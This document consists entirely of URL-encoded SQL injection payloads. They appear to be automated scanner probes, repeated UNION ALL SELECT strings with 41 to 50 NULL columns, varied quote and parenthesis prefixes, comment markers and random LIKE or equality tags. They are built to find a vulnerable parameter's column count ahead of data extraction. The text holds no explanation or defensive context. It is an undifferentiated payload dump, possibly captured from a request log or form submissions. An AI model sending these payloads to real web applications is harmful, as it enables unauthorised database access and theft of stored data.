1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27FVqO%27%20LIKE%20%27FVqO 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27bCiJ%27%20LIKE%20%27bCiJ 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27CCpN%27%20LIKE%20%27CCpN 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27RzFd%27%20LIKE%20%27RzFd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27rpPc%27%20LIKE%20%27rpPc 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27vPen%27%20LIKE%20%27vPen 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27hyng%27%20LIKE%20%27hyng 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27fLRC%27%20LIKE%20%27fLRC 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27EVNH%27%20LIKE%20%27EVNH 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27VZSo%27%20LIKE%20%27VZSo 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27kItU%27%20LIKE%20%27kItU 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27caml%27%20LIKE%20%27caml 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27pigW%27%20LIKE%20%27pigW 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Hlbx%27%20LIKE%20%27Hlbx 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27wxrp%27%20LIKE%20%27wxrp 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Kbdu%27%20LIKE%20%27Kbdu 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27MNiH%27%20LIKE%20%27MNiH 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27VoNX%27%20LIKE%20%27VoNX 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27tdUN%27%20LIKE%20%27tdUN 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27EdLT%27%20LIKE%20%27EdLT 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27dEMy%27%20LIKE%20%27dEMy 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27GKds%27%20LIKE%20%27GKds 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22DRWE%22%3D%22DRWE 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22cSfu%22%3D%22cSfu 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22xtgi%22%3D%22xtgi 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22gFys%22%3D%22gFys 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22gxjB%22%3D%22gxjB 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22tGVd%22%3D%22tGVd 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22Kbnx%22%3D%22Kbnx 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22Sqvu%22%3D%22Sqvu 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22OJRA%22%3D%22OJRA 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22GWKg%22%3D%22GWKg 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22DGNi%22%3D%22DGNi 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22DUnK%22%3D%22DUnK 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22aJnd%22%3D%22aJnd 